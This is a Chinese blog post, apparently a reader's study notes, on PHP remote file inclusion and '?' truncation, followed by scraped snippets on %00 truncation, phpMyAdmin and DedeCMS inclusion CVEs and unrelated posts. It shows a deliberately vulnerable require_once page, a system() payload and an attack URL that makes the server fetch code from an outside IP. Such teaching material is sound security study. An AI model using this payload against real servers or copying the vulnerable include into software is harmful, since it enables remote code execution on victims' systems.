php本地文件包含 截断,php远程文件包含截断问题

最新推荐文章于 2022-05-18 18:34:08 发布
最新推荐文章于 2022-05-18 18:34:08 发布
阅读量357 收藏
点赞数
文章标签: php本地文件包含 截断

今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞

可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令

服务器中有漏洞的页面代码为:

#test.php

#error_reporting(0);

$route="share";

$basePath=$_GET['param'];

if ($route == "share")

{

require_once $basePath.'/action/mshare.php';

}

elseif ($route == "sharelink")

{

require_once $basePath.'/action/m_shareliink.php';

}

攻击者服务器中的攻击脚本为:

#test1.txt

system("ver;"); #此处可以自己定义要执行的命令

?>

攻击者可以构造如下url远程调用攻击者服务器上的攻击脚本:

/test.php/?param=http://23.105.202.153/test.txt?

最后的问号会截断require_once在$basePath参数后的字符串

这里有一个问题,就是攻击者的攻击脚本只能保存为txt格式,而不能保存为php格式,否则会导致攻击脚本无法在受害者机器上运行。

还有一个问题需要解决,就是无法向攻击者编写的脚本传递参数,如果攻击者脚本加入了参数,则会导致无法截断,这一问题需要解决。

18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一.漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当 ...

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 参考文章1 参考文章2 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞. ...

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

漏洞详情 范围 phpMyAdmin 4.8.0和4.8.1 原理 首先在index.php 50-63行代码 $target_blacklist = array ( 'import.php', 'e ...

记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)

题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...

利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制

来源:http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.h ...

dedecmsv5.7sp1远程文件包含漏洞审计

dedecms5.7 sp1版本存在远程文件包含漏洞,在此记录审计复现漏洞过程. 漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆 ...

php本地及远程文件包含漏洞

在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen onallow_url_include on 但是开启这两个功能之后伴随的是url漏 ...

PHP文件包含漏洞剖析

一. 什么才是”远程文件包含漏洞”?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的. ...

随机推荐

(原)3.1 Zookeeper应用 - Master选举

本文为原创文章,转载请注明出处,谢谢 Master 选举 1.原理 服务器争抢创建标志为Master的临时节点 服务器监听标志为Master的临时节点,当监测到节点删除事件后展开新的一轮争抢 某个服务 ...

PowerDesigner之PDM(物理概念模型)

一.PDM概述 PDM(物理数据模型),通俗地理解,就是在PowerDesigner中以图形化的方式展示和设计数据库. PDM中涉及到的基本概念包括: 表: 列: 视图: 主键: 候选键: 外键: 存 ...

使用UIBezierPath和CAShapeLayer画各种图形

转载自:http://www.cocoachina.com/ios/20160214/15251.html CAShapeLayer 是 CALayer 的子类,但是比 CALayer 更灵活,可以画 ...

Java学习之抽象类的总结

抽象类的特点:1,方法只有声明没有实现时,该方法就是抽象方法,需要被abstract修饰,抽象方法必须定义在抽象类中,该类必须也被abstract修饰.2,抽象类不可以被实例化.为什么?因为调用抽象方 ...

IS_EER分析

下面我们就来具体分析一下这段代码,看看内核中的巧妙设计思路. 要想明白IS_ERR(),首先理解要内核空间.所有的驱动程序都是运行在内核空间,内核空间虽然很大,但总是有限的,而在这有限的空间中,其最后 ...

JXLS使用方法(文件上传读取)xlsx文件读取

1.官方文档:http://jxls.sourceforge.net/reference/reader.html 2.demo git地址:https://bitbucket.org/leonate/ ...

cross compile gdbserver

1. 下载gdb源码,7.12版本,下载地址:ftp://ftp.gnu.org/gnu/gdb.2. 编译gdb:0> cd gdb-7.121> mkdir __install2&gt ...

Mysql数据库多表查询

一.介绍 首先说一下,我们写项目一般都会建一个数据库,那数据库里面是不是存了好多张表啊,不可能把所有的数据都放到一张表里面,肯定要分表来存数据,这样节省空间,数据的组织结构更清晰,解耦和程度更高,但是 ...

Docker基础-搭建本地私有仓库

1.使用registry镜像创建私有仓库 安装Docker后,可以通过官方提供的registry镜像来简单搭建一套本地私有仓库环境: docker run -d -p 5000:5000 regist ...

Java不同场景oom错误探究及解决办法

1.OOM for Heap=>java.lang.OutOfMemoryError: Java heap space 分  析 此OOM是由于JVM中heap的最大值不满足需要,将设置heap ...

weixin_39951929
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞(二)
不秃头的程序Yang
07-01 1138
2、实操 2.1 虚拟机搭建test.php 1、文件包含%00 截断 符号 URL编码 # %23 ? %3f 00 %00 2.2 环境搭建
文件操作漏洞之文件包含(六)
guanjian_ci的博客
02-21 710
第一部分:文件包含 1.文件包含基本概念 开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含分本地包含和远程包含. 典型特征 变量的值为一个页面: ?page=a.php ?home=b.html ?file=content… 2.文件包含漏洞利用的前提条件 (1)web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参 数的方式引入; (2)用户能够控制包含
PHP任意文件包含绕过截断新姿势
weixin_33859844的博客
03-18 377
前言 此方法是@l3m0n叔叔给我分享的,原文已经发布在90sec 我没有90sec的账号,所以自己实践一下,顺道安利给访问我博客的小伙伴。 适用情况 可以控制协议的情况下,如果%00无法截断包含,可使用这招。 <?php $a = $_GET['file']; include $a.'.html.php'; 思路&方法 思路主要是利用了PHP的一个...
php 文件包含 截断,【原创】WEB安全第五章 漏洞学习与利用06文件包含截断
weixin_30789475的博客
03-13 252
WEB安全第五章 漏洞学习与利用06文件包含截断1、00截断法00字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/etc/passwd/etc/passwd%00http://include.moonteam.com/file02.php?file=x.jpg%0000字符截断(php<5.3.4)(需要 magic_quotes_gpc=off)/e...
php包含截断小结.txt
07-24
php截断技术
php使用iconv中文截断问题的解决方法
10-24
主要介绍了php使用iconv中文截断问题的解决方法,以实例形式较为详细的分析了出现中文截断问题的原因与具体解决方法,具有一定参考借鉴价值,需要的朋友可以参考下
PHP中iconv函数转码时截断字符问题的解决方法
10-24
主要介绍了PHP中iconv函数转码时截断字符问题的解决方法,本文给出的解决方法是使用mb_convert_encoding代替iconv,需要的朋友可以参考下
PHP UTF8中文字符截断函数代码
10-27
今天需要用一个UTF-8的字符串截断函数,网上找了几个代码片段发现都有问题,于是查了一下原理自己写了一个函数,代码片段如下
php文件包含详解,PHP文件包含漏洞详解(包含截断方法)
weixin_36011776的博客
03-16 374
突破限制截断后面的字符串技巧利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用)看漏洞代码:$webpath = dirname(__FILE__)."/";$filepath = "test.txt";for($i =1;$i<1000;$i++){$f...
PHP文件包含漏洞总结
dxm2025的专栏
11-13 678
0x00 前言 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 我们来看下面一段index.php代码: if ($_GET['func']) { include $_GET['fu
PHP文件包含漏洞详解
热门推荐
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
php本地文件包含 截断,php本地文件包含&远程文件包含
weixin_39888268的博客
03-13 136
由头:面试的时候被问到了,有些东西还是实践的太少,写此博客记录一下。php文件包含函数:include()require()include_once()require_once()本地文件包含:include($_GET['test']);?>exploit:包含当前目录的 lfi.txt(内容为): 跨目录包含:http://localhost:81/lfi/lfi.php?test=....
文件名截断漏洞原理分析
HelloWeb2014的博客
03-24 4791
文件名截断漏洞原理分析 By HelloWeb 2017-3-7 如下的PHP程序中(例子1),存在文件名被操控的漏洞,其代码如下:<?php $name=$_GET['name']; $filename=$name.'.php'; include $filename; ?> 例子1:文件名被操控的PHP程序 例子1的基本程序逻辑就是通过用户输入的文件名还包含对应文件后缀为PHP的文件
php 00截断,文件上传之\00截断文件包含之%00截断 文件包含漏洞详解 – jinglingshu的博客...
weixin_39640845的博客
03-09 3548
首先要明确\00截断与%00截断的关系:00截断就是将上传文件的文件名或路径名中使用ascii码值为0的字符进行截断来达到突破上传限制的目的,而%00一般用在URL中用于截断url来进行文件包含。两者之间的关系是:%00是ascii值为0字符的url编码形式,两者原理其实是一样的。一、\00的路径截断以网站http://www.hongkonggift.com为例,该网站存在注入,通过注入获取管理...
文件包含file_get_contents_截断文件包含和上传中的利用
weixin_39944146的博客
11-21 1663
截断大概可以在以下情况适用include(require)file_get_contentsfile_exists所有url中参数可以用%00控制0x01. 本地文件包含1.1 截断类型:php %00截断 截断条件:php版本小于5.3.4 详情关注CVE-2006-7243php的magic_quotes_gpc为OFF状态漏洞文件lfi.php<?php$temp = $_REQUES...
【复习】文件包含_02_截断
qq_45300786的博客
05-22 792
文件包含截断 1、00截断法 00字符截断(php<5.3.4) (需要 magic_quotes_gpc=off) /etc/passwd /etc/passwd%00 http://include.hahahaha.com/file02.php?file=x.jpg%00 2、超长文件截断 (php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256) 利用操作系统对目录最大长度限制。 在window下256字节 linux下4096字节 截断的字符有“.
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2122
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
Web安全-文件包含漏洞
11-04
文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用黑客控制的变量构建可执行代码的路径时,文件包含漏洞会导致黑客任意控制运行时执行的文件。      文件包含漏洞分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。这种漏洞貌不惊人,却危害很大。通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含文件包含漏洞还可能导致执行任意代码。      本节课程通过代码讲解文件包含漏洞的实战,深入理解文件包含漏洞的原理。
%00截断攻击的探索
ncafei的博客
03-18 8876
首先先来看一个简单的asp实例 [plain] view plain copy     username = request("username")       Response.write username   %>   这段代码从URL处获得参数username的值,然后显示在页面中。 可见%00之后的内容没有保存到变量中。
文件上传漏洞之00截断
最新发布
02-23
为了防止文件上传漏洞之00截断,开发人员应该在处理文件名时进行严格的验证和过滤,确保文件名不包含任何特殊字符或恶意代码。同时,还应该对上传的文件进行类型检查和后缀名验证,并使用安全的文件存储路径来避免...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值